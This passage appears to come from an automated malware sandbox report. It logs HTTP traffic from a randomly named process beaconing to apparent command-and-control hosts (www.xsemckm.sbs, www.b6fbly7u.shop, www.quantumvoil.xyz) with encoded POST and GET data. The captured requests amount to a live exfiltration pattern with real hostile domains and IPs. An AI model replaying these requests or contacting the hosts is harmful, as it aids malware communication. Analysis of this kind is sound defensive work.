                                              Data Ascii: 4dV43tA=H3smHWG9wmfUgdro/X7WaLyk39JPxZtPqadB3REawOQ0GWptUjIsYbmtDa+4KShJjtH9V0grWT2h0OHu2xKNPlyu3Tl/BZuupNvVrDk5YfKtBCpiIZ0WSR2HSYPOUqMCv+YdhIMbzT8m4N0Cxoq69FJ7gWf0f2XL0CV2rWxOf79qQV0nYjXC3J5y2xs+kDAW2UrjfT9A6+InJ+C3Os2a9hIP52GH


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.54973647.242.109.15803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:16:30.028462887 CEST1813OUTPOST /pyns/ HTTP/1.1
                                              Host: www.xsemckm.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.xsemckm.sbs
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.xsemckm.sbs/pyns/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 48 33 73 6d 48 57 47 39 77 6d 66 55 67 64 72 6f 2f 58 37 57 61 4c 79 6b 33 39 4a 50 78 5a 74 50 71 61 64 42 33 52 45 61 77 49 49 30 47 67 64 74 55 43 49 73 58 37 6d 74 66 71 2b 39 4b 53 67 4a 6a 70 72 78 56 30 73 56 57 51 43 68 33 6f 4c 75 77 44 69 4e 59 31 79 75 34 7a 6c 2b 65 4a 76 71 70 4e 2f 52 72 44 30 35 59 66 4b 74 42 42 78 69 62 73 41 57 51 52 32 47 54 59 4f 42 51 71 4d 6d 76 2f 77 4e 68 49 34 4c 7a 6e 77 6d 34 74 45 43 2b 37 53 36 69 31 4a 31 7a 6d 66 73 66 32 62 75 30 43 4a 36 72 57 46 77 66 38 52 71 41 44 49 37 64 33 54 41 73 2f 78 55 31 32 6b 48 31 33 59 6c 35 69 57 52 54 77 4a 78 78 39 67 46 44 72 36 68 4d 38 50 4f 71 58 67 56 34 43 6a 54 4b 65 70 58 75 45 51 70 5a 7a 7a 6b 55 31 75 53 56 71 71 75 33 38 66 47 5a 75 66 6d 74 64 79 7a 35 57 4d 34 63 30 49 42 4b 75 32 43 79 33 33 77 73 42 33 57 76 4b 34 4b 7a 4a 59 65 7a 68 45 2f 63 47 32 4b 52 79 62 4f 34 63 6b 64 2b 2b 63 38 56 31 48 45 70 6b 39 45 6d 75 64 66 73 59 2f 6d 77 66 6a 72 49 73 4d 61 31 6d 43 45 75 47 [TRUNCATED]
                                              Data Ascii: 4dV43tA=H3smHWG9wmfUgdro/X7WaLyk39JPxZtPqadB3REawII0GgdtUCIsX7mtfq+9KSgJjprxV0sVWQCh3oLuwDiNY1yu4zl+eJvqpN/RrD05YfKtBBxibsAWQR2GTYOBQqMmv/wNhI4Lznwm4tEC+7S6i1J1zmfsf2bu0CJ6rWFwf8RqADI7d3TAs/xU12kH13Yl5iWRTwJxx9gFDr6hM8POqXgV4CjTKepXuEQpZzzkU1uSVqqu38fGZufmtdyz5WM4c0IBKu2Cy33wsB3WvK4KzJYezhE/cG2KRybO4ckd++c8V1HEpk9EmudfsY/mwfjrIsMa1mCEuGTfDkyNFRcInsp1SbmqWgl1ozn05o9DcRlnWJ1C71mw7SnnWTPi/cwfL5KiQ/RIr785dycPem38n396Q4Km/Fx+wq1NkEFwqGuQJMy2GrQe6a+jkqJ6/bbVCOYnwAJ6DyROD/kSiTbdZa1lb1tS0d0y+URCQBQHjxZ/6fvn/yWLE+8crVbFg2At4D/9N1688V6AbZxTv7uNe84e+UKZwX4eNf+UWLFTut6yvCmqI2/JJBVU0/85SRiizPEkcMyhPG39ZOnol1vnoYWMqzsULUbJf27XN3cmZCd9g0VbdTzk9pA5QTlyWLQWF78CgyeOvTfxMcJbWaWGUKSbPvNt5D2LFapES52sknkrd8Dt88frRybBwhPJjlMCP0DkyOHFE1J5VVUDDZbt71Un8lBWp45Eh+iri4yt1C77waCdxdhIrVzkgIQQvFUsUN8Ti+1GQEWXLcNAJuIjxtVS8bGinkvU6Pra5QEWnBiI0kfQw83xlmM24ogizCux0PEjpLpQbl/PdsHwO0t2hqylWnkUDidHesh0lg61zBo+HSfSCCMCAfE7F/tx+pt/7FH1fgx9qPMd1y895RcnKk19dMGR6Jlmb5e6S7mxpUj3X3MXejEhBbgJgcOHZv5TL32H8z69UNQDk7s261+b/Hcx4as3i7gVbtvQmYm27NK8 [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.54973747.242.109.15803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:16:32.561088085 CEST526OUTGET /pyns/?3hkl=slNhbLXpBjO8vl&4dV43tA=K1EGEj+kimjFg9LR9EnSE5iA5qZu36FTtfUVuSlzoP8oPxhtdzERerS5Mp6fVz5Cq8+DdWETSgOpnIOU0gSGOk+1pkQ/H5TXrv7e3gEZftLrUi5jR50/YQGYV+ODUfVL1g== HTTP/1.1
                                              Host: www.xsemckm.sbs
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.549739121.254.178.238803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:16:59.555818081 CEST782OUTPOST /vjxp/ HTTP/1.1
                                              Host: www.b6fbly7u.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.b6fbly7u.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.b6fbly7u.shop/vjxp/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 61 6d 59 6a 69 33 45 71 63 6c 51 51 68 2f 2b 76 63 36 70 4a 67 58 2b 77 45 65 59 38 5a 4b 32 73 52 76 69 6e 31 6c 61 30 6e 77 67 30 53 6e 64 73 59 61 73 65 47 6d 32 52 46 33 63 56 69 71 58 41 36 6f 39 50 32 6f 34 33 6b 37 65 50 50 59 63 4a 70 38 62 50 79 75 30 6b 54 78 76 62 79 32 68 54 63 47 43 63 4d 6b 68 38 37 35 6e 54 36 31 4b 69 31 37 6e 75 67 51 35 30 75 4c 32 6e 33 57 36 32 45 39 41 77 4e 57 75 46 4b 74 49 79 71 47 74 55 49 76 48 38 36 41 65 68 4a 77 4d 4d 2b 72 79 47 34 43 49 51 31 68 6f 74 41 49 43 73 44 6b 6b 49 45 39 6f 6c 6e 74 32 31 73 43 4e 6e 4a 41 53 56 46 54 36 41 6c 45 41 3d
                                              Data Ascii: 4dV43tA=amYji3EqclQQh/+vc6pJgX+wEeY8ZK2sRvin1la0nwg0SndsYaseGm2RF3cViqXA6o9P2o43k7ePPYcJp8bPyu0kTxvby2hTcGCcMkh875nT61Ki17nugQ50uL2n3W62E9AwNWuFKtIyqGtUIvH86AehJwMM+ryG4CIQ1hotAICsDkkIE9olnt21sCNnJASVFT6AlEA=
                                              Jul 1, 2024 16:17:00.505011082 CEST367INHTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:00 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6a 78 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              10192.168.2.549740121.254.178.238803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:02.095932007 CEST802OUTPOST /vjxp/ HTTP/1.1
                                              Host: www.b6fbly7u.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.b6fbly7u.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.b6fbly7u.shop/vjxp/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 61 6d 59 6a 69 33 45 71 63 6c 51 51 67 66 4f 76 51 35 52 4a 6d 33 2b 33 64 75 59 38 57 71 32 6f 52 76 75 6e 31 6b 66 7a 67 47 51 30 63 6a 5a 73 5a 65 34 65 54 6d 32 52 4b 58 63 51 74 4b 58 31 36 6f 68 78 32 70 30 33 6b 34 69 50 50 61 45 4a 70 50 6a 4d 67 75 30 6d 56 78 76 56 32 32 68 54 63 47 43 63 4d 6b 31 47 37 34 50 54 36 46 36 69 31 66 7a 74 2b 67 35 31 74 4c 32 6e 67 47 36 79 45 39 41 57 4e 55 61 76 4b 76 77 79 71 48 64 55 50 38 66 2f 30 41 65 72 58 41 4e 51 75 2b 57 4d 78 44 55 75 30 44 52 34 54 2f 6e 58 50 79 4a 69 65 66 67 4e 30 4e 61 4e 38 52 46 51 59 77 7a 38 66 77 71 77 37 54 56 76 54 44 57 45 34 4b 43 54 65 50 37 59 53 2b 5a 57 6b 53 50 47
                                              Data Ascii: 4dV43tA=amYji3EqclQQgfOvQ5RJm3+3duY8Wq2oRvun1kfzgGQ0cjZsZe4eTm2RKXcQtKX16ohx2p03k4iPPaEJpPjMgu0mVxvV22hTcGCcMk1G74PT6F6i1fzt+g51tL2ngG6yE9AWNUavKvwyqHdUP8f/0AerXANQu+WMxDUu0DR4T/nXPyJiefgN0NaN8RFQYwz8fwqw7TVvTDWE4KCTeP7YS+ZWkSPG
                                              Jul 1, 2024 16:17:03.025872946 CEST367INHTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:03 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6a 78 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.549741121.254.178.238803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:04.641969919 CEST1819OUTPOST /vjxp/ HTTP/1.1
                                              Host: www.b6fbly7u.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.b6fbly7u.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.b6fbly7u.shop/vjxp/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 61 6d 59 6a 69 33 45 71 63 6c 51 51 67 66 4f 76 51 35 52 4a 6d 33 2b 33 64 75 59 38 57 71 32 6f 52 76 75 6e 31 6b 66 7a 67 46 77 30 63 51 42 73 59 35 45 65 42 57 32 52 48 33 63 52 74 4b 58 73 36 6f 35 39 32 70 6f 6e 6b 39 6d 50 65 50 59 4a 68 65 6a 4d 36 2b 30 6d 5a 52 76 59 79 32 68 43 63 47 53 59 4d 6b 6c 47 37 34 50 54 36 48 69 69 33 4c 6e 74 38 67 35 30 75 4c 32 52 33 57 36 61 45 39 6f 6f 4e 55 4f 56 4c 62 45 79 71 6e 4e 55 4a 50 37 2f 38 41 65 6c 57 41 4e 59 75 2b 54 57 78 44 4a 64 30 48 59 77 54 35 58 58 50 7a 68 38 43 66 30 4c 71 4d 61 4d 75 6d 39 53 43 6d 76 79 53 78 36 2f 7a 42 78 4a 54 54 53 75 34 65 75 63 55 65 4b 4b 46 61 6f 5a 70 43 6d 4b 4b 62 56 56 53 65 6e 77 35 78 36 74 30 35 6e 4f 66 38 69 4b 4c 64 2b 30 45 4a 45 46 38 64 33 37 66 42 78 35 44 58 41 36 53 76 37 4e 61 34 72 44 6a 42 64 37 51 64 5a 4b 53 37 37 35 53 55 46 77 77 55 47 46 74 6a 76 4a 66 33 47 39 47 4b 68 6e 69 7a 36 36 4e 73 64 4d 45 61 6f 48 39 6c 6d 51 68 77 50 55 45 58 76 71 59 2b 7a 37 54 45 [TRUNCATED]
                                              Data Ascii: 4dV43tA=amYji3EqclQQgfOvQ5RJm3+3duY8Wq2oRvun1kfzgFw0cQBsY5EeBW2RH3cRtKXs6o592ponk9mPePYJhejM6+0mZRvYy2hCcGSYMklG74PT6Hii3Lnt8g50uL2R3W6aE9ooNUOVLbEyqnNUJP7/8AelWANYu+TWxDJd0HYwT5XXPzh8Cf0LqMaMum9SCmvySx6/zBxJTTSu4eucUeKKFaoZpCmKKbVVSenw5x6t05nOf8iKLd+0EJEF8d37fBx5DXA6Sv7Na4rDjBd7QdZKS775SUFwwUGFtjvJf3G9GKhniz66NsdMEaoH9lmQhwPUEXvqY+z7TEVRPTS4MwyEE6EfeYO3KCWHfH/mjkIYN0rq3/IJXc4Si0Zqr6Be0pbS23ROJGAKLL7xmJllueQ31qCbIk9gpkZ1XK2kA3pJMxOPeMvxxEn6wofQ37FZLlX5SprMYAdlBtp3Qjg/+txb6FgfuiRs08xud+QdqM9yTar3/cvuB55Hx7IQbQ1yO6NRACDI/0RKPzK2n6KVWMHuMzFS6jW80Bg/9gcY5N1y1bJ+lIYPg/qrZP/ANO0gI3Kpw9HQ0+xwA1oHlViLYefppyB6/bPdMlaj5zgc5lN/bBIgNRXCkYR0fzqICGUPRy0Gt6fkmc+WA9pKhXagXGOM3Ij1PByTxAtOu19pxfmChji8EOWsFfrfNuavSGz0nCapVxxbOlh4HIZqlmjwrshxZoXUAQAS9pheoHmr1bEb2DEo98rrWiTJU+icRdX3COvMCpwEZacoykd7a5IhhVZky5p+zqpJzmzjwtm1tjxgedyyYw/eVEJq/lHYUdZieZTHm/bA6wbQk2GQX+fnASEII5GT58q5bDWkrveprSKUQYTL+OMj2QrD3xwCPyu1hzYEbbsDHgxXBR74hFns2X1xq2Z8OlKBUPLRfWDRCmHHNKP2xJW/gIN3FcdVcmklWooIai6rq3U3oA+qVmF3v+8TstRIXkB3luAyGVXPVmg5/g4p [TRUNCATED]
                                              Jul 1, 2024 16:17:05.573576927 CEST367INHTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:05 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6a 78 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.549742121.254.178.238803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:07.337584972 CEST528OUTGET /vjxp/?4dV43tA=XkwDhAosLmY8qOGkJKM7nBqGXPMJWqSVPKG+tEu7tnkRRA5qaKsxdm3QH0407PDb0a9c/bEAso+GP5FSns/F0pcfHDqX+WZ2QlqXVXtujZTwrVOl6ODb0zZvjrqBrFnJXw==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.b6fbly7u.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:08.265718937 CEST367INHTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:08 GMT
                                              Server: Apache
                                              Content-Length: 203
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6a 78 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vjxp/ was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.549743203.161.62.199803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:13.324881077 CEST788OUTPOST /gb2c/ HTTP/1.1
                                              Host: www.quantumvoil.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.quantumvoil.xyz
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.quantumvoil.xyz/gb2c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 78 2f 32 6b 4a 35 42 53 51 38 56 72 47 2f 4e 4c 43 6f 31 78 54 58 39 35 51 42 6f 5a 6f 6a 6c 39 31 33 33 56 51 4e 6b 35 54 44 35 58 38 48 71 42 4d 44 66 4d 49 58 61 4b 71 73 4a 67 44 54 45 48 76 47 78 30 66 59 52 30 47 75 31 7a 34 77 4b 37 4c 79 48 70 71 49 74 46 52 62 71 6c 65 65 57 71 65 58 51 7a 63 61 35 36 73 63 56 56 2b 50 4b 76 72 37 61 2f 6c 4e 58 7a 46 71 57 41 2f 65 55 70 4e 72 64 5a 4c 4b 4d 35 66 46 67 51 42 72 4c 2f 4e 43 4a 78 61 65 31 6a 6b 43 64 45 49 52 59 35 71 6f 72 49 4a 72 75 63 41 77 79 6f 66 78 70 35 48 69 56 7a 51 4f 44 36 54 71 31 35 65 51 70 51 6a 4f 6b 7a 5a 77 38 3d
                                              Data Ascii: 4dV43tA=x/2kJ5BSQ8VrG/NLCo1xTX95QBoZojl9133VQNk5TD5X8HqBMDfMIXaKqsJgDTEHvGx0fYR0Gu1z4wK7LyHpqItFRbqleeWqeXQzca56scVV+PKvr7a/lNXzFqWA/eUpNrdZLKM5fFgQBrL/NCJxae1jkCdEIRY5qorIJrucAwyofxp5HiVzQOD6Tq15eQpQjOkzZw8=
                                              Jul 1, 2024 16:17:13.934170961 CEST533INHTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:13 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.549744203.161.62.199803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:15.863521099 CEST808OUTPOST /gb2c/ HTTP/1.1
                                              Host: www.quantumvoil.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.quantumvoil.xyz
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.quantumvoil.xyz/gb2c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 78 2f 32 6b 4a 35 42 53 51 38 56 72 47 66 39 4c 4f 70 31 78 62 58 39 2b 65 68 6f 5a 6d 44 6c 35 31 33 4c 56 51 4d 68 6b 54 31 68 58 38 6d 61 42 65 43 66 4d 4c 58 61 4b 79 63 4a 6c 4f 7a 45 49 76 47 39 57 66 5a 74 30 47 71 64 7a 34 30 43 37 4c 67 76 32 72 59 74 48 5a 37 71 6e 51 2b 57 71 65 58 51 7a 63 61 74 41 73 63 4e 56 2b 2f 61 76 6b 2b 75 38 6d 4e 58 79 53 61 57 41 31 4f 56 75 4e 72 64 42 4c 4c 42 63 66 48 49 51 42 71 37 2f 4b 54 4a 79 41 4f 31 68 67 43 63 4e 59 43 39 70 68 59 62 4b 4b 61 53 42 59 69 36 4e 58 6e 45 54 64 41 64 62 44 75 76 43 44 35 39 4f 50 67 49 35 35 74 30 44 48 6e 70 49 78 64 61 57 66 59 43 58 6d 6f 44 38 6f 52 4d 65 6f 39 56 63
                                              Data Ascii: 4dV43tA=x/2kJ5BSQ8VrGf9LOp1xbX9+ehoZmDl513LVQMhkT1hX8maBeCfMLXaKycJlOzEIvG9WfZt0Gqdz40C7Lgv2rYtHZ7qnQ+WqeXQzcatAscNV+/avk+u8mNXySaWA1OVuNrdBLLBcfHIQBq7/KTJyAO1hgCcNYC9phYbKKaSBYi6NXnETdAdbDuvCD59OPgI55t0DHnpIxdaWfYCXmoD8oRMeo9Vc
                                              Jul 1, 2024 16:17:16.489027023 CEST533INHTTP/1.1 404 Not Found
